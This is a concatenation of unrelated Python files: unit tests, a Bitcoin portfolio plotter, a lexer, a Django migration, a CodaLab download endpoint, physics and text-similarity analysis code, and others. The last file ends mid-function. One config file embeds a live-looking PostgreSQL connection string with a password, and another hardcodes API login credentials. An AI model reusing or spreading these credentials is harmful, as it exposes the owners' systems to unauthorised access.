from treadmill.runtime.linux import runtime
class LinuxRuntimeTest(unittest.TestCase):
"""Tests for treadmill.runtime.linux.runtime.LinuxRuntime."""
def setUp(self):
self.root = tempfile.mkdtemp()
self.tm_env = mock.Mock(
configs_dir=os.path.join(self.root, 'confs')
)
self.container_dir = os.path.join(self.root, 'apps', 'foo.bar-0-baz')
self.data_dir = os.path.join(self.container_dir, 'data')
os.makedirs(self.data_dir)
patch = mock.patch(
'treadmill.supervisor.open_service',
return_value=mock.Mock(
data_dir=self.data_dir
)
)
patch.start()
self.addCleanup(patch.stop)
def tearDown(self):
if self.root and os.path.isdir(self.root):
shutil.rmtree(self.root)
@mock.patch('treadmill.runtime.linux.runtime._load_config', mock.Mock())
def test_run_invalid_type(self):
"""Test run aborting with invalid type."""
with io.open(os.path.join(self.data_dir, 'app.json'), 'w') as f:
f.writelines(utils.json_genencode({'type': 'invalid'}, indent=4))
with self.assertRaises(exc.ContainerSetupError) as cm:
runtime.LinuxRuntime(self.tm_env, self.container_dir).run()
self.assertEqual(
cm.exception.reason, app_abort.AbortedReason.INVALID_TYPE
)
@mock.patch('treadmill.runtime.linux.runtime._load_config', mock.Mock())
@mock.patch(
'treadmill.runtime.linux._run.run',
side_effect=services.ResourceServiceTimeoutError(
'Resource not available in time'
)
)
def test_run_timeout(self, _mock_run):
"""Test run aborting with timeout."""
with io.open(os.path.join(self.data_dir, 'app.json'), 'w') as f:
f.writelines(utils.json_genencode({'type': 'native'}, indent=4))
with self.assertRaises(exc.ContainerSetupError) as cm:
runtime.LinuxRuntime(self.tm_env, self.container_dir).run()
self.assertEqual(
cm.exception.reason, app_abort.AbortedReason.TIMEOUT
)
if __name__ == '__main__':
unittest.main()
|
import sys, os
import argparse
import time
import datetime
from classes import Havelock
from classes import Bitcoin
from classes import Rates
from config import Config
from utils import get_console_size
import numpy as np
import matplotlib.pyplot as plot
import matplotlib.dates as md
cmdline_parse = cp = \
argparse.ArgumentParser(
description="BTC.de and Havelock portfolio analyser",
epilog="Blaaaaa.......")
cp.add_argument("-B", "--btcde-csv-file", type=str,
default=Config.btc_de_history,
help="Bitcoin.de transaction log / history")
cp.add_argument("-H", "--havelock-csv-file", type=str,
default=Config.hl_history,
help="Havelock transaction log / history")
cp.add_argument("-R", "--rate-file", type=str,
default=Config.rate_file,
help="File with rate for your symbols")
cp.add_argument("-S", "--start-time", type=str,
default="2010-01-01",
help="Time to start from in form %Y-%M-%D")
cp.add_argument("-X", "--symbol", type=str,
help="show one single symbol only")
args = cp.parse_args()
bitcoin = Bitcoin(Config)
havelock = Havelock(Config)
rates = Rates()
rates.load(args.rate_file)
fn = args.btcde_csv_file
if os.path.exists(fn) and os.path.isfile(fn):
bitcoin.loadTransactionFile(fn)
else:
print "[-] no bitcoin.de transaction history found..."
fn = args.havelock_csv_file
if os.path.exists(fn) and os.path.isfile(fn):
havelock.loadTransactionFile(fn)
else:
print "[-] no havelock transaction history found..."
#debug a single symbol
if args.symbol is not None:
print "analyse symbol {:s}".format(args.symbol)
s = havelock.portfolio.getSymbol(args.symbol)
#if s is None:
# print "failed to get data for that symbol"
# sys.exit(1)
if not rates.hasSymbol(args.symbol):
print "symbol not found in ratefile!"
sys.exit(1)
minTs = rates.getMinTimestamp(args.symbol)
maxTs = rates.getMaxTimestamp(args.symbol)
diff = maxTs - minTs
steps = diff / 200
timestamps = []
r = []
for ts in range(minTs, maxTs, steps):
timestamps.append(datetime.datetime.fromtimestamp(ts))
r.append(rates.getRate(args.symbol, ts))
fig = plot.figure()
ax = fig.add_subplot(111)
plot.xticks( rotation=25 )
xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S')
ax.xaxis.set_major_formatter(xfmt)
ax.plot(timestamps, r, 'ks-', label="Rate")
ax.legend(loc=1)
if args.symbol == "BITCOIN":
plot.show()
sys.exit(0)
d = s.getDividend()
timestampsDividend = []
dividends = []
ax2 = ax.twinx()
for dividend in d:
ts = dividend.getTimestamp()
timestampsDividend.append(datetime.datetime.fromtimestamp(ts))
havelock.setEndDate(ts)
qt = s.getShareQuantity()
div = dividend.getAmount()
perShare = div / float(qt)
#dividends.append(dividend.getAmount())
#print "{:d} shares, dividend {:f}, per Share {:f}".format(qt, div, perShare)
dividends.append(perShare)
ax2.axvline(x=timestampsDividend[-1], ymin=0, ymax=1)
ax2.plot(timestampsDividend, dividends, 'bs-', label="Dividend per Share")
ax2.legend(loc=2)
plot.show()
sys.exit(0)
# debug win / loss calculation
# all symbols
analyse = havelock.portfolio.getSymbols().keys()
dates = havelock.transactions.getTimestamps()
des = []
yes = {}
xes = {}
dxes = {}
for sym in analyse:
yes[sym] = []
xes[sym] = []
dxes[sym] = []
btcX = []
btcY = []
wins = []
bwins = []
btcCount = []
cnt = 0
symbols = havelock.portfolio.getSymbols().values()
depotMode = None
oldDepositValue = 0.0
oldWithdrawValue = 0.0
reduceBtc=0.0
for d in dates:
ds = datetime.datetime.fromtimestamp(d)
des.append(ds)
#print "{:d} transactions until {:s}:".format(cnt, ds.strftime("%Y-%m-%d %H:%M:%s"))
havelock.setEndDate(d)
deposit = havelock.transactions.getDepositAmount()
if deposit != oldDepositValue:
reduceBtc = deposit-oldDepositValue
#print "{:d} entering deposit mode, deposit {:f} btc to havelock".format(cnt, reduceBtc)
oldDepositValue = deposit
depotMode = True
bitcoin.setEndDate(d)
val = 0.0
por = 0.0
for sym in symbols:
name = sym.getName()
if name not in analyse:
continue
amount = sym.getShareQuantity()
rate = rates.getRate(name, d)
book = sym.getBookAmount()
div = sym.getDividendAmount()
cur = amount * rate
win = cur - book + div
val += win
por += cur
if amount != 0:
yes[name].append(win)
xes[name].append(d)
dxes[name].append(ds)
withdraw = bitcoin.transactions.getWithdrawAmount()
if withdraw != oldWithdrawValue:
diff = withdraw-oldWithdrawValue
#print "{:d} withdraw {:f} btc from bitcoin.de".format(cnt, diff)
oldWithdrawValue = withdraw
if (reduceBtc - diff) < 0.0001 and (reduceBtc - diff) > -0.0001:
depotMode = False
reduceBtc = 0.0
btc = rates.getRate("BITCOIN", d)
btcBalance = bitcoin.getBalance()
btcCount.append(btcBalance+havelock.getBalance(False)+por-reduceBtc)
invest = bitcoin.getInvest()
bwin = ((btcBalance-reduceBtc) * btc) + (por * btc) + invest
bwins.append(bwin)
btcX.append(ds)
btcY.append(btc)
wins.append(val) #havelock.getBalance(False) + val)
cnt += 1
ts = int(time.mktime(datetime.datetime.strptime(args.start_time, "%Y-%m-%d").timetuple()))
fig = plot.figure()
ax = fig.add_subplot(121)
colors = ["b-", "g-", "r-", "c-", "m-", "y-", "k-"]
ci = 0
plot.xticks( rotation=25 )
xfmt = md.DateFormatter('%Y-%m-%d %H:%M:%S')
ax.xaxis.set_major_formatter(xfmt)
for sym in analyse:
start = -1
for (i, x) in enumerate(xes[sym]):
if x > ts:
start = i
break
if start != -1:
ax.plot(dxes[sym][start:], yes[sym][start:], colors[ci], label=sym)
ci = (ci+1)%len(colors)
start = 0
for (i,x) in enumerate(dates):
if x > ts:
start = i
break
ax.plot(des[start:], wins[start:], 'ko-', label='win')
ax.legend(loc=3)
ax_1 = ax.twinx()
ax_1.plot(des[start:], btcCount[start:], 'yx-', label="BTCs")
ax_1.legend(loc=4)
ax2 = fig.add_subplot(122)#ax.twinx()
ax2.xaxis.set_major_formatter(xfmt)
plot.xticks( rotation=25 )
ax2.plot(btcX[start:], btcY[start:], 'bs-', label="BTC price")
ax2.legend(loc=3)
ax3 = ax2.twinx()
ax3.plot(btcX[start:], bwins[start:], 'rs-', label="total win")
ax3.legend(loc=1)
plot.show()
sys.exit(0)
|
class Config:
# DB_URL = "sqlite:///db_test.db"
DB_URL = "postgresql://vwlxwdavxfjvuf:1c32bebadc0a765b3467ea904fc4a8e9f7ee3453c26ed215503d9a5e4f20993d@ec2-52-2-82-109.compute-1.amazonaws.com/d7pjfkh1cgosoi"
|
import streamreader
import state
from orderedcollections import *
class Scanner:
def __init__(
self,
instream=None,
startStateId=None,
states={},
classes={},
keywords={},
identifierTokenId=-1,
eatComments=False,
commentTokenId=-1,
):
        # dict() below copies each default argument: Python evaluates default
        # parameter values only once, so without the copy every Scanner
        # instance would share (and mutate) the same dict objects.
self.states = dict(states)
self.classes = dict(classes)
self.startStateId = startStateId
self.reader = streamreader.StreamReader(instream)
self.keywords = dict(keywords)
        self.identifierTokenId = identifierTokenId
self.eatComments = eatComments
self.commentTokenId = commentTokenId
for stateId in states:
states[stateId].setClasses(classes)
def getToken(self):
# Here the getToken method must skip whitespace and then run the finite state machine starting with self.startStateId.
# The finite state machine is an infinite loop of getting characters from the reader and transitioning between states.
# The getToken method returns a tuple of (tokenId, lex) where tokenId is the token Identifier from the state or from the
# map of keywords if the lexeme is in the keyword map.
# If a transition is not found, then an exception can be raised like this.
# raise Exception("Bad Token '"+lex+"' found at line " + str(self.reader.getLineNumber()) + " and column " + str(self.reader.getColNumber()) + ".")
self.reader.skipWhiteSpace()
currentStateId = self.startStateId
lex = ""
while True:
currentState = self.states[currentStateId]
# get character
ch = self.reader.readChar()
# look for trans on that char from the current state
currentStateId = currentState.onGoTo(ord(ch))
if currentStateId == state.NoTransition:
if currentState.isAccepting():
self.reader.unreadChar(ch)
return (currentState.getAcceptsTokenId(), lex)
raise Exception(
"Bad Token '"
+ lex
+ "' found at line "
+ str(self.reader.getLineNumber())
+ " and column "
+ str(self.reader.getColNumber())
+ "."
)
else:
lex += ch
# return(0, ch)
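# A hedged, standalone illustration of the pitfall the __init__ comment above
# guards against: default parameter values are evaluated once, so a mutable
# default is shared across calls unless copied. The function below is a toy
# demo, not part of the Scanner API.
def _shared_default_demo(store={}):
    store["calls"] = store.get("calls", 0) + 1
    return store

if __name__ == "__main__":
    first = _shared_default_demo()
    second = _shared_default_demo()
    # Both calls returned the very same dict, which is why Scanner.__init__
    # copies its default dicts with dict(...) before storing them.
    assert first is second and second["calls"] == 2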
|
# Generated by Django 3.0.5 on 2020-06-03 18:36
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pessoas', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ProfileUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('profile', models.ImageField(null=True, upload_to='user-profile/%d/%m/%Y/')),
('name', models.CharField(max_length=200)),
('email', models.EmailField(max_length=200, null=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.DeleteModel(
name='Pessoa',
),
]
|
import httplib
import mimetypes
from bottle import abort, get, local, request, response
from codalab.lib import spec_util, zip_util
from codalab.objects.permission import check_bundles_have_read_permission
@get('/bundle/<uuid:re:%s>/contents/blob/' % spec_util.UUID_STR)
@get('/bundle/<uuid:re:%s>/contents/blob/<path:path>' % spec_util.UUID_STR)
def get_blob(uuid, path=''):
"""
API to download the contents of a bundle or a subpath within a bundle.
For directories this method always returns a tarred and gzipped archive of
the directory.
For files, if the request has an Accept-Encoding header containing gzip,
then the returned file is gzipped.
"""
check_bundles_have_read_permission(local.model, request.user, [uuid])
bundle = local.model.get_bundle(uuid)
target_info = local.download_manager.get_target_info(uuid, path, 0)
if target_info is None:
abort(httplib.NOT_FOUND, 'Not found.')
# Figure out the file name.
if not path and bundle.metadata.name:
filename = bundle.metadata.name
else:
filename = target_info['name']
if target_info['type'] == 'directory':
# Always tar and gzip directories.
filename = filename + '.tar.gz'
fileobj = local.download_manager.stream_tarred_gzipped_directory(uuid, path)
elif target_info['type'] == 'file':
if not zip_util.path_is_archive(filename) and request_accepts_gzip_encoding():
# Let's gzip to save bandwidth. The browser will transparently decode
# the file.
filename = filename + '.gz'
fileobj = local.download_manager.stream_file(uuid, path, gzipped=True)
else:
fileobj = local.download_manager.stream_file(uuid, path, gzipped=False)
else:
# Symlinks.
abort(httplib.FORBIDDEN, 'Cannot download files of this type.')
# Set headers.
mimetype, _ = mimetypes.guess_type(filename, strict=False)
response.set_header('Content-Type', mimetype or 'text/plain')
if zip_util.get_archive_ext(filename) == '.gz' and request_accepts_gzip_encoding():
filename = zip_util.strip_archive_ext(filename)
response.set_header('Content-Encoding', 'gzip')
else:
response.set_header('Content-Encoding', 'identity')
response.set_header('Content-Disposition', 'filename="%s"' % filename)
return fileobj
def request_accepts_gzip_encoding():
# See rules for parsing here: https://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
# Browsers silently decode gzipped files, so we save some bandwidth.
if 'Accept-Encoding' not in request.headers:
return False
for encoding in request.headers['Accept-Encoding'].split(','):
encoding = encoding.strip().split(';')
if encoding[0] == 'gzip':
if len(encoding) > 1 and encoding[1] == 'q=0':
return False
else:
return True
return False
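# A hedged, standalone sketch of the Accept-Encoding rule described above: the
# helper takes a raw header string instead of the bottle request object and is
# illustrative only, not part of the REST API.
def _accepts_gzip(header_value):
    for encoding in header_value.split(','):
        parts = encoding.strip().split(';')
        if parts[0] == 'gzip':
            # 'gzip;q=0' explicitly refuses gzip; any other form accepts it.
            return not (len(parts) > 1 and parts[1] == 'q=0')
    return False

if __name__ == '__main__':
    assert _accepts_gzip('gzip, deflate')
    assert not _accepts_gzip('identity, gzip;q=0')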
|
from base import add, createSkeleton
# Additional functions
def addToArmy(data, army, id):
if (len(data) == 3):
(name, health, damage) = tuple(data)
add(createSkeleton(name, id, int(health), int(damage)), army)
elif (len(data) == 1):
add(createSkeleton(data[0], id), army)
print('Unit added')
def printSkeleton(skeleton):
print('skeletonID - ', skeleton['id'])
print('Name - ', skeleton['name'])
print('Health - ', skeleton['health'])
print('Damage - ', skeleton['damage'])
def printArmy(army):
for unit in army:
print('\n')
printSkeleton(unit)
print('\n---------------')
|
import requests
import logging
SESSION = requests.Session()
APP_URL = 'https://qa-interview-api.migo.money'
USER = 'egg'
PASSWORD = 'f00BarbAz'
LOG = logging.getLogger()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 18 16:47:25 2017
@author: dgratz
"""
import numpy as np
import itertools
import math
import matplotlib.pyplot as plt
from scipy import signal
import matplotlib
from collections import deque
def calcSync(vVal,vTime):
syncT = np.zeros(vTime.shape[0])
syncV = np.zeros(vVal.shape[0])
for i in range(vTime.shape[0]):
syncT[i] = np.std(vTime[i,:])
syncV[i] = np.std(vVal[i,:])
return syncT,syncV
def distance(p1,p2):
return math.hypot(p2[0] - p1[0], p2[1] - p1[1])
def manhatDist(p):
p1,p2 = p
return abs(p1[0]-p2[0])+abs(p1[1]-p2[1])
def addCells(cells):
newCells = set()
for cell in cells:
newCells.add((cell[0]+1,cell[1]))
newCells.add((cell[0]-1,cell[1]))
newCells.add((cell[0],cell[1]+1))
newCells.add((cell[0],cell[1]-1))
return newCells.union(cells)
def smallestDistCells(cells):
cellList = list(cells)
cellsDists = [{c} for c in cellList]
while not any(map(lambda cd: len(cd.intersection(cells))>1,cellsDists)):
for i in range(len(cellsDists)):
cellsDists[i] = addCells(cellsDists[i])
pairs = set()
for cell,cellDist in zip(cellList,cellsDists):
for pair in cellDist.intersection(cells)-set([cell]):
pairs.add(frozenset([cell,pair]))
return set(map(lambda x: tuple(x),pairs))
def argmins(beatCells):
minVal = None
minsPos = []
    for pos,elem in enumerate(beatCells):
if minVal is None:
minVal = elem
minsPos.append(pos)
elif minVal == elem:
minsPos.append(pos)
elif elem < minVal:
minsPos = [pos]
return minsPos
def tDiff(cs,times,poses):
c1,c2 = cs
return abs(times[poses.index(c1)]-times[poses.index(c2)])
def calcTimeSync(vVal,vTime,nextBeatDist=3):
tVals = np.concatenate(tuple(arr for col in vTime for arr in col))
vVals = np.concatenate(tuple(arr for col in vVal for arr in col))
badData = []
for i in range(len(vVals)):
if vVals[i] < 0:
badData.append(i)
tVals = np.delete(tVals,badData)
vVals = np.delete(vVals,badData)
sortedPos = tVals.argsort()
tVals = tVals[sortedPos]
cells = []
for cn,col in enumerate(vVal):
for rn,arr in enumerate(col):
cells += [(rn,cn)]*len(arr)
cells = [cells[ind] for ind in sortedPos]
beatLists = []
currentBeatSets = []
currentBeatLists = []
for i,cell in enumerate(cells):
removeCBS = None
potentials = []
for j,CBS in enumerate(currentBeatSets):
if cell in CBS:
removeCBS = j
elif any(map(lambda c: manhatDist((cell,c)) <= nextBeatDist,CBS)):
potentials.append((j,len(currentBeatSets[j])))
ML = max(potentials,key=lambda x: x[1]) if len(potentials) > 0 else None
if ML is not None:
currentBeatSets[ML[0]].add(cell)
currentBeatLists[ML[0]].append(i)
else:
currentBeatSets.append(set([cell]))
currentBeatLists.append([i])
if removeCBS is not None:
beatLists.append(currentBeatLists[removeCBS])
del currentBeatSets[removeCBS]
del currentBeatLists[removeCBS]
syncT = []
syncV = []
times = []
for beatList in beatLists:
# syncT.append(np.std(tVals[beatList]))
if len(beatList) < 2:
continue
beatCellsL = [cells[c] for c in beatList]
beatCells = set(beatCellsL)
smCells = smallestDistCells(beatCells)
smCellsL = list(smCells)
vals = list(map(lambda am: tDiff(am,tVals[beatList],beatCellsL),smCellsL))
aM = np.argmax(vals)
syncT.append(vals[aM])
syncV.append(np.std(vVals[beatList]))
times.append(np.mean(tVals[beatList]))
times,syncT,syncV = np.array(times),np.array(syncT),np.array(syncV)
sortedArgs = times.argsort()
times = times[sortedArgs]
syncT = syncT[sortedArgs]
return times,syncT,syncV
def calcSyncVarLen(vVal,vTime):
tVals = np.concatenate(tuple(arr for col in vTime for arr in col))
vVals = np.concatenate(tuple(arr for col in vVal for arr in col))
badData = []
for i in range(len(vVals)):
if vVals[i] < 0:
badData.append(i)
tVals = np.delete(tVals,badData)
vVals = np.delete(vVals,badData)
sortedPos = tVals.argsort()
tVals = tVals[sortedPos]
vVals = vVals[sortedPos]
cells = []
for cn,col in enumerate(vVal):
for rn,arr in enumerate(col):
cells += [(rn,cn)]*len(arr)
cells = [cells[ind] for ind in sortedPos]
mhatDistCells = np.zeros(len(cells)-1)
for i in range(len(cells)-1):
mhatDistCells[i] = manhatDist((cells[i],cells[i+1]))
# plt.plot(mhatDistCells)
beatSets = []
foundCells = set()
begin = 0
for i,cell in enumerate(cells):
if cell in foundCells and len(foundCells) >= 2:
beatSets.append(slice(begin,i))
begin += cells[begin:i].index(cell)+1
foundCells = set(cells[begin:i+1])
else:
foundCells.add(cell)
syncT = []
syncV = []
times = []
beatSetNum = 0
i = 0
while i < len(cells) and beatSetNum < len(beatSets):
minBeatSet = beatSetNum
        minBeatSetVal = float('inf')  # start above any mean distance so the first candidate can become the minimum
while beatSetNum < len(beatSets) and beatSets[beatSetNum].start <= i and i < beatSets[beatSetNum].stop:
beatSetVal = np.mean(mhatDistCells[beatSets[beatSetNum]])
if beatSetVal < minBeatSetVal:
minBeatSetVal = beatSetVal
minBeatSet = beatSetNum
beatSetNum += 1
begin = beatSets[minBeatSet].start
end = beatSets[minBeatSet].stop
beatCells = set(cells[begin:end])
smCells = smallestDistCells(beatCells)
# distances = np.array([distance(cells[pos],cells[begin]) for pos in range(begin+1,i)])
smCellsL = list(smCells)
vals = list(map(lambda am: tDiff(am,tVals[begin:end],cells[begin:end]),smCellsL))
aM = np.argmax(vals)
# print(tVals[begin],tVals[begin:i][cells[begin:i].index(p[0])])
# syncT.append(np.max((tVals[begin+1:i]-tVals[begin])/(distances))/len(foundCells))
# syncT.append(vals[aM])
syncT.append(np.std(vals))
syncV.append(np.std(vVals[begin:end]))
times.append(np.mean(tVals[begin:end]))
i = end
while beatSetNum < len(beatSets) and beatSets[beatSetNum].start <= i-1 and i-1 < beatSets[beatSetNum].stop:
beatSetNum += 1
# plt.plot([begin,end],[8,7])
# plt.figure()
return np.array(times),np.array(syncT),np.array(syncV)
|
import unittest
from katas.kyu_6.find_the_divisors import divisors
class FindTheDivisorsTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(divisors(12), [2, 3, 4, 6])
def test_equals_2(self):
self.assertEqual(divisors(25), [5])
def test_equals_3(self):
self.assertEqual(divisors(13), '13 is prime')
def test_equals_4(self):
self.assertEqual(divisors(15), [3, 5])
|
from os.path import join, expanduser, dirname
"""
Global config options
"""
DATA_DIR = "/data3/private/liujiahua/new/data"
TRANS_DATA_DIR = "/data1/private/liujiahua"
NEW_EN = join(DATA_DIR, "en")
NEW_EN_TRANS_DE = join(TRANS_DATA_DIR, "_wiki_data_en/translate_de")
NEW_EN_TRANS_ZH = join(TRANS_DATA_DIR, "_wiki_data_en/translate_zh")
NEW_FR_TRANS = join(TRANS_DATA_DIR, "wiki_data_fr/translate_en")
NEW_DE_TRANS = join(TRANS_DATA_DIR, "wiki_data_de/translate_en")
NEW_RU_TRANS = join(TRANS_DATA_DIR, "wiki_data_ru/translate_en")
NEW_PT_TRANS = join(TRANS_DATA_DIR, "wiki_data_pt/translate_en")
NEW_ZH_TRANS = join(TRANS_DATA_DIR, "wiki_data_zh/translate_en")
NEW_PL_TRANS = join(TRANS_DATA_DIR, "wiki_data_pl/translate_en")
NEW_UK_TRANS = join(TRANS_DATA_DIR, "wiki_data_uk/translate_en")
NEW_TA_TRANS = join(TRANS_DATA_DIR, "wiki_data_ta/translate_en")
NEW_FR_ORI = join(DATA_DIR, "fr")
NEW_DE_ORI = join(DATA_DIR, "de")
NEW_RU_ORI = join(DATA_DIR, "ru")
NEW_PT_ORI = join(DATA_DIR, "pt")
NEW_ZH_ORI = join(DATA_DIR, "zh")
NEW_PL_ORI = join(DATA_DIR, "pl")
NEW_UK_ORI = join(DATA_DIR, "uk")
NEW_TA_ORI = join(DATA_DIR, "ta")
CORPUS_NAME_TO_PATH = {
"en": NEW_EN,
"en_trans_de": NEW_EN_TRANS_DE,
"en_trans_zh": NEW_EN_TRANS_ZH,
"fr_trans_en": NEW_FR_TRANS,
"de_trans_en": NEW_DE_TRANS,
"ru_trans_en": NEW_RU_TRANS,
"pt_trans_en": NEW_PT_TRANS,
"zh_trans_en": NEW_ZH_TRANS,
"pl_trans_en": NEW_PL_TRANS,
"uk_trans_en": NEW_UK_TRANS,
"ta_trans_en": NEW_TA_TRANS,
"fr": NEW_FR_ORI,
"de": NEW_DE_ORI,
"ru": NEW_RU_ORI,
"pt": NEW_PT_ORI,
"zh": NEW_ZH_ORI,
"pl": NEW_PL_ORI,
"uk": NEW_UK_ORI,
"ta": NEW_TA_ORI,
}
CORPUS_DIR = join(dirname(__file__), "data")
|
import wsdm.ts.helpers.persons.persons as p_lib
from wsdm.ts.helpers.tfidf.professions_tfidf_dictionary import PROFESSIONS_DICT
from wsdm.ts.helpers.tfidf.nationalities_tfidf_dictionary import NATIONALITIES_DICT
import os
import definitions
from collections import Counter
import operator
import re
def split_into_sentences(text):
caps = "([A-Z])"
prefixes = "(Mr|St|Mrs|Ms|Dr)[.]"
suffixes = "(Inc|Ltd|Jr|Sr|Co)"
starters = "(Mr|Mrs|Ms|Dr|He\s|She\s|It\s|They\s|Their\s|Our\s|We\s|But\s|However\s|That\s|This\s|Wherever)"
acronyms = "([A-Z][.][A-Z][.](?:[A-Z][.])?)"
websites = "[.](com|net|org|io|gov)"
text = " " + text + " "
text = text.replace("\n"," ")
text = re.sub(prefixes,"\\1<prd>",text)
text = re.sub(websites,"<prd>\\1",text)
if "Ph.D" in text: text = text.replace("Ph.D.","Ph<prd>D<prd>")
text = re.sub("\s" + caps + "[.] "," \\1<prd> ",text)
text = re.sub(acronyms+" "+starters,"\\1<stop> \\2",text)
text = re.sub(caps + "[.]" + caps + "[.]" + caps + "[.]","\\1<prd>\\2<prd>\\3<prd>",text)
text = re.sub(caps + "[.]" + caps + "[.]","\\1<prd>\\2<prd>",text)
text = re.sub(" "+suffixes+"[.] "+starters," \\1<stop> \\2",text)
text = re.sub(" "+suffixes+"[.]"," \\1<prd>",text)
text = re.sub(" " + caps + "[.]"," \\1<prd>",text)
if "”" in text: text = text.replace(".”","”.")
if "\"" in text: text = text.replace(".\"","\".")
if "!" in text: text = text.replace("!\"","\"!")
if "?" in text: text = text.replace("?\"","\"?")
text = text.replace(".",".<stop>")
text = text.replace("?","?<stop>")
text = text.replace("!","!<stop>")
text = text.replace("<prd>",".")
sentences = text.split("<stop>")
sentences = sentences[:-1]
sentences = [s.strip() for s in sentences]
return sentences
def custom_similarity(person, key, words_dict):
result = 0
person_file = os.path.join(definitions.PERSONS_DIR, p_lib.remove_spaces(person) + ".txt")
if os.path.isfile(person_file):
with open(person_file, 'r', encoding='utf8') as fr:
tfidf_words = words_dict[key]
sorted_tfidf_words = sorted(tfidf_words.items(), key=operator.itemgetter(1))
max_weight = sorted_tfidf_words[-1][1]
file_content = fr.read()
person_words = p_lib.split_to_words(file_content.lower())
document_dict = Counter(person_words)
sentences_count = len(split_into_sentences(file_content))
for word in tfidf_words:
current_word_weight = tfidf_words[word] / max_weight
if word in document_dict:
result += document_dict[word] * current_word_weight
if sentences_count == 0:
sentences_count = 1
result = result / sentences_count
result *= 55
if result > 7:
return 7
return result
def find_similarity(person_name, term, inputType):
    if inputType == definitions.TYPE_NATIONALITY:
        words_dict = NATIONALITIES_DICT
    elif inputType == definitions.TYPE_PROFESSION:
        words_dict = PROFESSIONS_DICT
    else:
        raise TypeError
    return custom_similarity(person_name, term, words_dict)
|
#!/usr/bin/env python3
#test_completion.py
#*
#* --------------------------------------------------------------------------
#* Licensed under MIT (https://git.biohpc.swmed.edu/gudmap_rbk/rna-seq/-/blob/14a1c222e53f59391d96a2a2e1fd4995474c0d15/LICENSE)
#* --------------------------------------------------------------------------
#*
import pytest
import pandas as pd
from io import StringIO
import os
import json
test_output_path = os.path.dirname(os.path.abspath(__file__)) + \
'/../../'
@pytest.mark.completionMultiqc
def test_multiqcExist(filename):
assert os.path.exists(os.path.join(
test_output_path, filename))
|
# -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
from ragendja.template import render_to_response
def staff_only(view):
"""
Decorator that requires user.is_staff. Otherwise renders no_access.html.
"""
@login_required
def wrapped(request, *args, **kwargs):
if request.user.is_active and request.user.is_staff:
return view(request, *args, **kwargs)
return render_to_response(request, 'no_access.html')
return wrapped
def redirect_to_google_login(next, login_url=None, redirect_field_name=None):
from google.appengine.api import users
return HttpResponseRedirect(users.create_login_url(next))
def google_login_required(function):
def login_required_wrapper(request, *args, **kw):
if request.user.is_authenticated():
return function(request, *args, **kw)
return redirect_to_google_login(request.get_full_path())
return login_required_wrapper
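# A hedged usage sketch: the view below is hypothetical (not part of the
# original module) and only shows how staff_only wraps an ordinary view;
# non-staff users are shown no_access.html instead of the view body.
@staff_only
def _example_staff_dashboard(request):
    return render_to_response(request, 'staff_dashboard.html')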
|
#!/usr/bin/env python
from __future__ import print_function
import fastjet as fj
import fjcontrib
import fjext
import ROOT
import tqdm
import yaml
import copy
import argparse
import os
from pyjetty.mputils import *
from heppy.pythiautils import configuration as pyconf
import pythia8
import pythiafjext
import pythiaext
from pyjetty.alice_analysis.process.base import process_base
from pyjetty.alice_analysis.process.user.ang.helpers import lambda_alpha_kappa_i
from array import array
import numpy as np
# Prevent ROOT from stealing focus when plotting
ROOT.gROOT.SetBatch(True)
# Automatically set Sumw2 when creating new histograms
ROOT.TH1.SetDefaultSumw2()
################################################################
class pythia_parton_hadron(process_base.ProcessBase):
#---------------------------------------------------------------
# Constructor
#---------------------------------------------------------------
def __init__(self, input_file='', config_file='', output_dir='',
debug_level=0, args=None, **kwargs):
super(pythia_parton_hadron, self).__init__(
input_file, config_file, output_dir, debug_level, **kwargs)
self.initialize_config(args)
#---------------------------------------------------------------
# Main processing function
#---------------------------------------------------------------
def pythia_parton_hadron(self, args):
# Create ROOT TTree file for storing raw PYTHIA particle information
outf_path = os.path.join(self.output_dir, args.tree_output_fname)
outf = ROOT.TFile(outf_path, 'recreate')
outf.cd()
# Initialize response histograms
self.initialize_hist()
pinfo('user seed for pythia', self.user_seed)
# mycfg = ['PhaseSpace:pThatMin = 100']
mycfg = ['Random:setSeed=on', 'Random:seed={}'.format(self.user_seed)]
mycfg.append('HadronLevel:all=off')
# PYTHIA instance with MPI off
setattr(args, "py_noMPI", True)
pythia = pyconf.create_and_init_pythia_from_args(args, mycfg)
# print the banner first
fj.ClusterSequence.print_banner()
print()
self.init_jet_tools()
self.calculate_events(pythia)
pythia.stat()
print()
# PYTHIA instance with MPI on
setattr(args, "py_noMPI", False)
pythia_MPI = pyconf.create_and_init_pythia_from_args(args, mycfg)
self.calculate_events(pythia_MPI, MPIon=True)
print()
if not self.no_tree:
for jetR in self.jetR_list:
getattr(self, "tw_R%s" % str(jetR).replace('.', '')).fill_tree()
self.scale_print_final_info(pythia, pythia_MPI)
outf.Write()
outf.Close()
self.save_output_objects()
#---------------------------------------------------------------
# Initialize config file into class members
#---------------------------------------------------------------
def initialize_config(self, args):
# Call base class initialization
process_base.ProcessBase.initialize_config(self)
# Read config file
with open(self.config_file, 'r') as stream:
config = yaml.safe_load(stream)
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
# Defaults to None if not in use
self.level = args.no_match_level
self.jetR_list = config["jetR"]
self.user_seed = args.user_seed
self.nev = args.nev
self.observable_list = config["process_observables"]
self.obs_settings = {}
self.obs_grooming_settings = {}
self.obs_names = {}
for obs in self.observable_list:
obs_config_dict = config[obs]
obs_config_list = [name for name in list(obs_config_dict.keys()) if 'config' in name ]
obs_subconfig_list = [name for name in list(obs_config_dict.keys()) if 'config' in name ]
self.obs_settings[obs] = self.utils.obs_settings(
obs, obs_config_dict, obs_subconfig_list)
self.obs_grooming_settings[obs] = self.utils.grooming_settings(obs_config_dict)
self.obs_names[obs] = obs_config_dict["common_settings"]["xtitle"]
# Construct set of unique grooming settings
self.grooming_settings = []
